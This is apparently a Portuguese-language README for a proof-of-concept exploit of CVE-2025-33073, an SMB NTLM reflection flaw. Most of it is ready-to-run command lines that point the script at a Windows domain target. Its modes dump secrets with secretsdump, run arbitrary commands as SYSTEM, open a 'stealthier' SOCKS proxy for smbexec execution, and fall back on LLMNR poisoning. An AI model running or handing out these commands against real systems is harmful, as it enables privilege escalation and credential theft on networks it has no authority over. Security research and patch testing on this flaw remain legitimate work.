
PoC Exploit para a falha de reflexão NTLM no SMB.
PoC Exploit para a falha de reflexão NTLM no SMB.
Todos os créditos vão para a pesquisa oficial:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
SO: Kali Linux (tem a maioria dos pacotes pré-instalados).
GUI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

CLI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Comando personalizado
Em vez de executar o secretsdump, um comando personalizado pode ser executado.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS
Para uma execução de comandos mais furtiva após uma conexão válida como SYSTEM ter sido estabelecida. --target e --target-ip devem ser iguais aqui.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
Também é possível executar um comando personalizado através do proxychains em vez de extrair o SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Se você estiver no mesmo domínio de broadcast que o dispositivo e ele for vulnerável a envenenamento LLMNR, é possível explorar um dispositivo sem precisar registrar um registro DNS.

A autenticação NTLM local ocorre

A autenticação NTLM local não ocorre, resultando em uma tentativa FAILED
